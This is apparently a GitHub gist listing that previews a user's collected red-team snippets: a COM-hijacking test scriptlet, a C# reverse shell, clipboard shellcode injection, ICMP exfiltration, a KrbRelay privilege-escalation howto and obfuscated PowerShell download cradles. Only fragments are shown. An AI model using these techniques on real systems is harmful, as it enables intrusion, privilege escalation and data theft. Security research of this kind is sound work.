Unleashed Unleashedmen

@Unleashedmen
Unleashedmen / AtomicRedTeam.sct
Created October 25, 2020 18:32 — forked from totoroha/AtomicRedTeam.sct
Sample COM Hijacking Atomic Red Team Test
<?XML version="1.0"?>
<scriptlet>
<registration
description="AtomicRedTeam"
progid="AtomicRedTeam"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
remotable="true"
>
@Unleashedmen
Unleashedmen / Rulz.py
Created January 24, 2021 03:32 — forked from monoxgas/Rulz.py
#!/usr/bin/env python
# Rulz.py
# Author: Nick Landers (@monoxgas) - Silent Break Security
import os
import sys
import argparse
import re
import binascii
import codecs
@Unleashedmen
Unleashedmen / Simple_Rev_Shell.cs
Created June 11, 2021 21:14
C# Simple Reverse Shell Code
using System;
using System.Text;
using System.IO;
using System.Diagnostics;
using System.ComponentModel;
using System.Linq;
using System.Net;
using System.Net.Sockets;
@Unleashedmen
Unleashedmen / ClippyShellcodeInject.cs
Created November 21, 2021 15:39
Clipboard Shellcode Injection
// Using the clipboard as your code cave.
// Generate your shellcode with msfvenom or whatever
// Compile: C:\windows\Microsoft.NET\Framework64\v3.5\csc.exe C:\Path\To\ClippyShellcodeInject.cs
using System;
using System.IO;
using System.Runtime.InteropServices;
namespace ClippySCInject
{
@Unleashedmen
Unleashedmen / icmp_exfiltration.py
Created February 15, 2022 23:43 — forked from maxrodrigo/icmp_exfiltration.py
ICMP Exfiltration
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from scapy.all import sniff, ICMP
def process_packet(packet):
    if packet.haslayer(ICMP) and packet[ICMP].type == 0:
        data = packet[ICMP].load[-8:]
        try:
#!/usr/bin/env bash
# sudo apt install hashcat
echo -e "\033[32m"
echo '
_ _ ___
/\/\ ___ __| (_) / _ \__ _ ___ ___
/ \ / _ \ / _` | |/ /_)/ _` / __/ __|
/ /\/\ \ (_) | (_| | / ___/ (_| \__ \__ \
@Unleashedmen
Unleashedmen / krbrelay_privesc_howto.md
Created May 2, 2022 01:28 — forked from tothi/krbrelay_privesc_howto.md
Privilege Escalation using KrbRelay and RBCD

KrbRelay with RBCD Privilege Escalation HOWTO

Short HOWTO about one use case of the work from Cube0x0 (KrbRelay) and others.

TL;DR

No-Fix Local Privilege Escalation from low-privileged domain user to local system on domain-joined computers.

Prerequisites:

  • LDAP signing not required on Domain Controller (default!)
// TcbElevation - Authors: @splinter_code and @decoder_it
#define SECURITY_WIN32
#include <windows.h>
#include <sspi.h>
#include <stdio.h>
#pragma comment(lib, "Secur32.lib")
void EnableTcbPrivilege(BOOL enforceCheck);
@Unleashedmen
Unleashedmen / Download-Cradles-Oneliners.md
Created November 16, 2022 04:26 — forked from mgeeky/Download-Cradles-Oneliners.md
Various PowerShell Download Cradles purposed as one-liners

Download Cradles

0) Extra goodies

  • Obfuscated FromBase64String with -bxor nice for dynamic strings deobfuscation:
$t=([type]('{1}{0}'-f'vert','Con'));($t::(($t.GetMethods()|?{$_.Name-clike'F*g'}).Name).Invoke('Yk9CA05CA0hMV0I=')|%{$_-bxor35}|%{[char]$_})-join''
  • The same as above but for UTF-16 base64 encoded strings:
@Unleashedmen
Unleashedmen / gpt.py
Created February 19, 2023 19:42 — forked from ustayready/gpt.py
CloudGPT - Use ChatGPT to analyze AWS policies for vulnerabilities
import openai
import boto3
import json
import time
from typing import Dict, List
openai.api_key = '### SET YOUR OPENAPI API KEY HERE ###'
session = boto3.session.Session()
client = session.client('iam')